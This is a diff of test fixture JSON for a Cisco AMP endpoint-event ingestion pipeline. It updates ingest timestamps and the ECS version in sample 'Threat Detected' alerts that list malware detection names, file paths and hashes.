@@ -2590,7 +2590,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581782448Z", + "ingested": "2021-09-13T18:06:53.271948047Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":470000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542427\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2647,7 +2647,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2675,7 +2675,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581784321Z", + "ingested": "2021-09-13T18:06:53.271949953Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":112000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542426\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2732,7 +2732,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2764,7 +2764,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581786193Z", + "ingested": "2021-09-13T18:06:53.271951854Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668103677542000,\"timestamp\":1610705695,\"timestamp_nanoseconds\":71000000,\"date\":\"2021-01-15T10:14:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668103677542425\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2821,7 +2821,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2853,7 +2853,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581788054Z", + "ingested": "2021-09-13T18:06:53.271953745Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":532000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2910,7 +2910,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2938,7 +2938,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581790080Z", + "ingested": "2021-09-13T18:06:53.271955687Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":454000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667841684537366\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2995,7 +2995,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3027,7 +3027,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581791973Z", + "ingested": "2021-09-13T18:06:53.271957592Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667841684537000,\"timestamp\":1610705634,\"timestamp_nanoseconds\":80000000,\"date\":\"2021-01-15T10:13:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667841684537365\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3084,7 +3084,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3106,7 +3106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581793892Z", + "ingested": "2021-09-13T18:06:53.271959511Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258118058508000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":636000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258118058508361\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3163,7 +3163,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3191,7 +3191,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581795768Z", + "ingested": "2021-09-13T18:06:53.271961417Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667837389570000,\"timestamp\":1610705633,\"timestamp_nanoseconds\":689000000,\"date\":\"2021-01-15T10:13:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667837389570068\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3248,7 +3248,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3270,7 +3270,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581797669Z", + "ingested": "2021-09-13T18:06:53.271963308Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258066518901000,\"timestamp\":1610705621,\"timestamp_nanoseconds\":608000000,\"date\":\"2021-01-15T10:13:41+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258066518900808\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3327,7 +3327,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3349,7 +3349,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581799549Z", + "ingested": "2021-09-13T18:06:53.271965221Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176258014979293000,\"timestamp\":1610705609,\"timestamp_nanoseconds\":581000000,\"date\":\"2021-01-15T10:13:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176258014979293255\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3406,7 +3406,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3428,7 +3428,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581801458Z", + "ingested": "2021-09-13T18:06:53.271967114Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176257963439686000,\"timestamp\":1610705597,\"timestamp_nanoseconds\":569000000,\"date\":\"2021-01-15T10:13:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176257963439685702\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3485,7 +3485,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3517,7 +3517,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581803331Z", + "ingested": "2021-09-13T18:06:53.271969012Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":778000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533667579691532307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3574,7 +3574,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3602,7 +3602,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581805234Z", + "ingested": "2021-09-13T18:06:53.271970883Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":747000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532306\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3659,7 +3659,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3691,7 +3691,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581807110Z", + "ingested": "2021-09-13T18:06:53.271972769Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667579691532000,\"timestamp\":1610705573,\"timestamp_nanoseconds\":371000000,\"date\":\"2021-01-15T10:12:53+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667579691532305\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3748,7 +3748,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3776,7 +3776,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581809002Z", + "ingested": "2021-09-13T18:06:53.271974626Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533667575396565000,\"timestamp\":1610705572,\"timestamp_nanoseconds\":971000000,\"date\":\"2021-01-15T10:12:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6533667575396565008\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", 
